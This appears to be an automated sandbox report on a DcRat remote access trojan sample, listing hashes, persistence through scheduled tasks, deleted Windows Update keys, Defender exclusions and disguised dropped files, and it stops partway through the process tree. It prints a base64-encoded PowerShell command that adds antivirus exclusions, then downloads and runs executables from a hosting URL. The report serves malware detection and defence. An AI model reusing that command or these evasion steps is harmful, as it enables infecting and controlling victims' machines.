Analysis
-
max time kernel
136s -
max time network
130s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
21-07-2024 19:24
Static task
static1
Behavioral task
behavioral1
Sample
Speedy.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
Speedy.exe
Resource
win10v2004-20240709-en
General
-
Target
Speedy.exe
-
Size
160KB
-
MD5
7b9610cdb99b9973810e3e25e2548ba9
-
SHA1
776ecee620560f31d35fbd9894737e7b4133d29a
-
SHA256
1c0757e44587291a3152fe7c3ee1d49c64c5ad9bbfd2123a65a772783f0bc096
-
SHA512
29d185e3dcd8bfadd3f8c30bf03ac57a44d10581859a6a449339b63e86be9d02c8a9382f27d82474006770afce8f1d80cb69acd8abc761656bd9cf3d2a4e3660
-
SSDEEP
3072:Tu6Wqq2AkZytOeiibKnESWEA6eb7THe+fgy2MPSX16zhn9gkZkb/Xw:q69q2AgytuimESWEA7DfgynPSX1mn9ub
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe -
Process spawned unexpected child process 39 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5036 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1084 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 648 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3180 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3060 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4516 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 552 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3384 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3228 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 752 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1836 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4092 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3980 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1008 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2556 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4268 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1544 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4108 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4372 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4484 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4364 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 464 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4616 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4688 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3080 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 448 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4164 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2896 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3580 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4316 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4628 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2192 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4228 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4824 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3412 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2780 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5036 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4552 2168 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1084 2168 schtasks.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Tor.exe dcrat C:\DriverHostCrtNet\comSvc.exe dcrat behavioral2/memory/4404-67-0x0000000000150000-0x0000000000306000-memory.dmp dcrat C:\Program Files\Java\jre-1.8\lib\images\cursors\RCXE600.tmp dcrat C:\DriverHostCrtNet\System.exe dcrat C:\Program Files (x86)\Google\Update\1.3.36.371\RCXF4C0.tmp dcrat C:\Program Files (x86)\Google\Temp\winlogon.exe dcrat C:\Program Files\Windows Multimedia Platform\lsass.exe dcrat behavioral2/memory/3320-450-0x0000000000440000-0x00000000005F6000-memory.dmp dcrat -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 1664 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2764 powershell.exe 3140 powershell.exe 1948 powershell.exe 2820 powershell.exe 2472 powershell.exe 4364 powershell.exe 3364 powershell.exe 3940 powershell.exe 5092 powershell.exe 4616 powershell.exe 2784 powershell.exe 2816 powershell.exe 3452 powershell.exe 1664 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
ft.execomSvc.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts ft.exe File opened for modification C:\Windows\System32\drivers\etc\hosts comSvc.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Speedy.exeTor.exeWScript.execomSvc.exeSystem.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation Speedy.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation Tor.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation comSvc.exe Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation System.exe -
Executes dropped EXE 5 IoCs
Processes:
ft.exeTor.execomSvc.exeSystem.exeSystem.exepid process 4876 ft.exe 1252 Tor.exe 4404 comSvc.exe 3320 System.exe 5280 System.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Power Settings 1 TTPs 5 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.execmd.exepid process 4980 powercfg.exe 3220 powercfg.exe 4260 powercfg.exe 2720 powercfg.exe 1256 cmd.exe -
Drops file in Program Files directory 27 IoCs
Processes:
comSvc.exeft.exedescription ioc process File created C:\Program Files (x86)\Google\Temp\cc11b995f2a76d comSvc.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\RCXE5A1.tmp comSvc.exe File created C:\Program Files\ModifiableWindowsApps\conhost.exe comSvc.exe File created C:\Program Files\Windows Security\BrowserCore\en-US\e6c9b481da804f comSvc.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\RCXF4C0.tmp comSvc.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\RCXF4C1.tmp comSvc.exe File created C:\Program Files\Windows Security\BrowserCore\en-US\OfficeClickToRun.exe comSvc.exe File opened for modification C:\Program Files\Windows Security\BrowserCore\en-US\OfficeClickToRun.exe comSvc.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\System.exe comSvc.exe File created C:\Program Files\Windows Multimedia Platform\lsass.exe comSvc.exe File opened for modification C:\Program Files\Windows Security\BrowserCore\en-US\RCXEB05.tmp comSvc.exe File opened for modification C:\Program Files (x86)\Google\Temp\RCXFA73.tmp comSvc.exe File opened for modification C:\Program Files (x86)\Google\Temp\winlogon.exe comSvc.exe File opened for modification C:\Program Files\Windows Multimedia Platform\RCX11F.tmp comSvc.exe File opened for modification C:\Program Files\Windows Multimedia Platform\lsass.exe comSvc.exe File created C:\Program Files (x86)\Google\Temp\winlogon.exe comSvc.exe File opened for modification C:\Program Files\Windows Security\BrowserCore\en-US\RCXEAF4.tmp comSvc.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\RCXE600.tmp comSvc.exe File created C:\Program Files\Google\Chrome\updaterload.exe ft.exe File created C:\Program Files (x86)\Google\Update\1.3.36.371\27d1bcfc3c54e0 comSvc.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\conhost.exe comSvc.exe File created C:\Program Files\Java\jre-1.8\lib\images\cursors\conhost.exe comSvc.exe File created C:\Program Files\Java\jre-1.8\lib\images\cursors\088424020bedd6 comSvc.exe File opened for modification C:\Program Files (x86)\Google\Temp\RCXFA04.tmp comSvc.exe File opened for modification C:\Program Files\Windows Multimedia Platform\RCX19D.tmp comSvc.exe File created C:\Program Files (x86)\Google\Update\1.3.36.371\System.exe comSvc.exe File created C:\Program Files\Windows Multimedia Platform\6203df4a6bafc7 comSvc.exe -
Drops file in Windows directory 5 IoCs
Processes:
comSvc.exedescription ioc process File created C:\Windows\Web\RuntimeBroker.exe comSvc.exe File created C:\Windows\Web\9e8d7a4ca61bd9 comSvc.exe File opened for modification C:\Windows\Web\RCXF019.tmp comSvc.exe File opened for modification C:\Windows\Web\RCXF01A.tmp comSvc.exe File opened for modification C:\Windows\Web\RuntimeBroker.exe comSvc.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 2028 sc.exe 1620 sc.exe 4288 sc.exe 1708 sc.exe 3124 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 3 IoCs
Processes:
Tor.execomSvc.exeSystem.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings Tor.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ comSvc.exe Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings System.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 39 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 648 schtasks.exe 752 schtasks.exe 3980 schtasks.exe 2556 schtasks.exe 4108 schtasks.exe 464 schtasks.exe 2896 schtasks.exe 2192 schtasks.exe 2780 schtasks.exe 5036 schtasks.exe 1084 schtasks.exe 3384 schtasks.exe 4092 schtasks.exe 3080 schtasks.exe 4824 schtasks.exe 5036 schtasks.exe 1836 schtasks.exe 4372 schtasks.exe 4688 schtasks.exe 1084 schtasks.exe 1008 schtasks.exe 4616 schtasks.exe 4316 schtasks.exe 4228 schtasks.exe 3412 schtasks.exe 3180 schtasks.exe 4516 schtasks.exe 4268 schtasks.exe 1544 schtasks.exe 4364 schtasks.exe 448 schtasks.exe 4552 schtasks.exe 3060 schtasks.exe 552 schtasks.exe 3228 schtasks.exe 4484 schtasks.exe 4164 schtasks.exe 3580 schtasks.exe 4628 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.execomSvc.exepowershell.exepid process 1664 powershell.exe 1664 powershell.exe 2556 powershell.exe 2556 powershell.exe 5092 powershell.exe 5092 powershell.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4304 powershell.exe 4304 powershell.exe 4304 powershell.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe 4404 comSvc.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Speedy.exepowershell.exepowershell.exepowershell.execomSvc.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 4304 Speedy.exe Token: SeDebugPrivilege 1664 powershell.exe Token: SeDebugPrivilege 2556 powershell.exe Token: SeDebugPrivilege 5092 powershell.exe Token: SeDebugPrivilege 4404 comSvc.exe Token: SeDebugPrivilege 4304 powershell.exe Token: SeShutdownPrivilege 4980 powercfg.exe Token: SeCreatePagefilePrivilege 4980 powercfg.exe Token: SeShutdownPrivilege 3220 powercfg.exe Token: SeCreatePagefilePrivilege 3220 powercfg.exe Token: SeShutdownPrivilege 4260 powercfg.exe Token: SeCreatePagefilePrivilege 4260 powercfg.exe Token: SeShutdownPrivilege 2720 powercfg.exe Token: SeCreatePagefilePrivilege 2720 powercfg.exe Token: SeIncreaseQuotaPrivilege 4304 powershell.exe Token: SeSecurityPrivilege 4304 powershell.exe Token: SeTakeOwnershipPrivilege 4304 powershell.exe Token: SeLoadDriverPrivilege 4304 powershell.exe Token: SeSystemProfilePrivilege 4304 powershell.exe Token: SeSystemtimePrivilege 4304 powershell.exe Token: SeProfSingleProcessPrivilege 4304 powershell.exe Token: SeIncBasePriorityPrivilege 4304 powershell.exe Token: SeCreatePagefilePrivilege 4304 powershell.exe Token: SeBackupPrivilege 4304 powershell.exe Token: SeRestorePrivilege 4304 powershell.exe Token: SeShutdownPrivilege 4304 powershell.exe Token: SeDebugPrivilege 4304 powershell.exe Token: SeSystemEnvironmentPrivilege 4304 powershell.exe Token: SeRemoteShutdownPrivilege 4304 powershell.exe Token: SeUndockPrivilege 4304 powershell.exe Token: SeManageVolumePrivilege 4304 powershell.exe Token: 33 4304 powershell.exe Token: 34 4304 powershell.exe Token: 35 4304 powershell.exe Token: 36 4304 powershell.exe Token: SeIncreaseQuotaPrivilege 4304 powershell.exe Token: SeSecurityPrivilege 4304 powershell.exe Token: SeTakeOwnershipPrivilege 4304 powershell.exe Token: SeLoadDriverPrivilege 4304 powershell.exe Token: SeSystemProfilePrivilege 4304 powershell.exe Token: SeSystemtimePrivilege 4304 powershell.exe Token: SeProfSingleProcessPrivilege 4304 powershell.exe Token: SeIncBasePriorityPrivilege 4304 powershell.exe Token: SeCreatePagefilePrivilege 4304 powershell.exe Token: SeBackupPrivilege 4304 powershell.exe Token: SeRestorePrivilege 4304 powershell.exe Token: SeShutdownPrivilege 4304 powershell.exe Token: SeDebugPrivilege 4304 powershell.exe Token: SeSystemEnvironmentPrivilege 4304 powershell.exe Token: SeRemoteShutdownPrivilege 4304 powershell.exe Token: SeUndockPrivilege 4304 powershell.exe Token: SeManageVolumePrivilege 4304 powershell.exe Token: 33 4304 powershell.exe Token: 34 4304 powershell.exe Token: 35 4304 powershell.exe Token: 36 4304 powershell.exe Token: SeIncreaseQuotaPrivilege 4304 powershell.exe Token: SeSecurityPrivilege 4304 powershell.exe Token: SeTakeOwnershipPrivilege 4304 powershell.exe Token: SeLoadDriverPrivilege 4304 powershell.exe Token: SeSystemProfilePrivilege 4304 powershell.exe Token: SeSystemtimePrivilege 4304 powershell.exe Token: SeProfSingleProcessPrivilege 4304 powershell.exe Token: SeIncBasePriorityPrivilege 4304 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Speedy.exepowershell.exeTor.exeWScript.exeft.execmd.execmd.execmd.execomSvc.exedescription pid process target process PID 4304 wrote to memory of 1664 4304 Speedy.exe powershell.exe PID 4304 wrote to memory of 1664 4304 Speedy.exe powershell.exe PID 1664 wrote to memory of 2556 1664 powershell.exe powershell.exe PID 1664 wrote to memory of 2556 1664 powershell.exe powershell.exe PID 1664 wrote to memory of 4876 1664 powershell.exe ft.exe PID 1664 wrote to memory of 4876 1664 powershell.exe ft.exe PID 1664 wrote to memory of 1252 1664 powershell.exe Tor.exe PID 1664 wrote to memory of 1252 1664 powershell.exe Tor.exe PID 1664 wrote to memory of 1252 1664 powershell.exe Tor.exe PID 1252 wrote to memory of 4108 1252 Tor.exe WScript.exe PID 1252 wrote to memory of 4108 1252 Tor.exe WScript.exe PID 1252 wrote to memory of 4108 1252 Tor.exe WScript.exe PID 4108 wrote to memory of 1028 4108 WScript.exe cmd.exe PID 4108 wrote to memory of 1028 4108 WScript.exe cmd.exe PID 4108 wrote to memory of 1028 4108 WScript.exe cmd.exe PID 4876 wrote to memory of 5092 4876 ft.exe powershell.exe PID 4876 wrote to memory of 5092 4876 ft.exe powershell.exe PID 1028 wrote to memory of 4404 1028 cmd.exe comSvc.exe PID 1028 wrote to memory of 4404 1028 cmd.exe comSvc.exe PID 4876 wrote to memory of 1380 4876 ft.exe cmd.exe PID 4876 wrote to memory of 1380 4876 ft.exe cmd.exe PID 4876 wrote to memory of 1256 4876 ft.exe cmd.exe PID 4876 wrote to memory of 1256 4876 ft.exe cmd.exe PID 4876 wrote to memory of 4304 4876 ft.exe powershell.exe PID 4876 wrote to memory of 4304 4876 ft.exe powershell.exe PID 1380 wrote to memory of 2028 1380 cmd.exe sc.exe PID 1380 wrote to memory of 2028 1380 cmd.exe sc.exe PID 1256 wrote to memory of 4980 1256 cmd.exe powercfg.exe PID 1256 wrote to memory of 4980 1256 cmd.exe powercfg.exe PID 1380 wrote to memory of 1620 1380 cmd.exe sc.exe PID 1380 wrote to memory of 1620 1380 cmd.exe sc.exe PID 1256 wrote to memory of 3220 1256 cmd.exe powercfg.exe PID 1256 wrote to memory of 3220 1256 cmd.exe powercfg.exe PID 1256 wrote to memory of 4260 1256 cmd.exe powercfg.exe PID 1256 wrote to memory of 4260 1256 cmd.exe powercfg.exe PID 1380 wrote to memory of 4288 1380 cmd.exe sc.exe PID 1380 wrote to memory of 4288 1380 cmd.exe sc.exe PID 1256 wrote to memory of 2720 1256 cmd.exe powercfg.exe PID 1256 wrote to memory of 2720 1256 cmd.exe powercfg.exe PID 1380 wrote to memory of 1708 1380 cmd.exe sc.exe PID 1380 wrote to memory of 1708 1380 cmd.exe sc.exe PID 1380 wrote to memory of 3124 1380 cmd.exe sc.exe PID 1380 wrote to memory of 3124 1380 cmd.exe sc.exe PID 1380 wrote to memory of 1540 1380 cmd.exe reg.exe PID 1380 wrote to memory of 1540 1380 cmd.exe reg.exe PID 1380 wrote to memory of 452 1380 cmd.exe reg.exe PID 1380 wrote to memory of 452 1380 cmd.exe reg.exe PID 1380 wrote to memory of 4060 1380 cmd.exe reg.exe PID 1380 wrote to memory of 4060 1380 cmd.exe reg.exe PID 1380 wrote to memory of 1628 1380 cmd.exe reg.exe PID 1380 wrote to memory of 1628 1380 cmd.exe reg.exe PID 1380 wrote to memory of 3824 1380 cmd.exe reg.exe PID 1380 wrote to memory of 3824 1380 cmd.exe reg.exe PID 4404 wrote to memory of 2472 4404 comSvc.exe powershell.exe PID 4404 wrote to memory of 2472 4404 comSvc.exe powershell.exe PID 4404 wrote to memory of 3452 4404 comSvc.exe powershell.exe PID 4404 wrote to memory of 3452 4404 comSvc.exe powershell.exe PID 4404 wrote to memory of 2820 4404 comSvc.exe powershell.exe PID 4404 wrote to memory of 2820 4404 comSvc.exe powershell.exe PID 4404 wrote to memory of 3940 4404 comSvc.exe powershell.exe PID 4404 wrote to memory of 3940 4404 comSvc.exe powershell.exe PID 4404 wrote to memory of 2816 4404 comSvc.exe powershell.exe PID 4404 wrote to memory of 2816 4404 comSvc.exe powershell.exe PID 4404 wrote to memory of 1948 4404 comSvc.exe powershell.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Speedy.exe"C:\Users\Admin\AppData\Local\Temp\Speedy.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAbAB5ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAdQB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACAANAAwADEAOgAgAE4AbwAgAFYAUABTACAAaQBzACAAYQBsAGwAbwB3AGUAZAAhACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBmAHgAeQAjAD4AOwAiADsAPAAjAG4AdwBrACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQBpAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBmAHgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZABsAGoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGEAbgBvAGUAYQBzAHkAMQAvAGMAZABzAHYAZgBkAGUAcgBiAHQAYgB1AHQAeQBuAC8AcgBhAHcALwBjADAAZgA5AGQAMAA2AGEAYgAzADIAMABlAGQANgA2ADUAMwAxAGMAMgBkADEAMgBhADYAZABlAGQAOAA1ADgAOAAwADMAOABjAGMAMwAxAC8AawBwAHUAbgB0AGwAdQBjAC4AZQB4AGUAJwAsACAAPAAjAHgAaABiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBzAGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBsAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZgB0AC4AZQB4AGUAJwApACkAPAAjAGUAdgB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBsAHUAYwBpAGEAbgBvAGUAYQBzAHkAMQAvAGMAZABzAHYAZgBkAGUAcgBiAHQAYgB1AHQAeQBuAC8AcgBhAHcALwBjADAAZgA5AGQAMAA2AGEAYgAzADIAMABlAGQANgA2ADUAMwAxAGMAMgBkADEAMgBhADYAZABlAGQAOAA1ADgAOAAwADMAOABjAGMAMwAxAC8AdgBvAGwAdQBuAGUALgBlAHgAZQAnACwAIAA8ACMAcABsAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBlAHYAZgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGIAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBUAG8AcgAuAGUAeABlACcAKQApADwAIwBkAGwAagAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBrAHcAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAawB0AGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZgB0AC4AZQB4AGUAJwApADwAIwB3AGMAdQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAHEAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZwB3AHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVABvAHIALgBlAHgAZQAnACkAPAAjAHUAaQBzACMAPgA="2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#quz#>[System.Windows.Forms.MessageBox]::Show('Error 401: No VPS is allowed!','','OK','Error')<#fxy#>;3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
C:\Users\Admin\AppData\Local\Temp\ft.exe"C:\Users\Admin\AppData\Local\Temp\ft.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4876 -
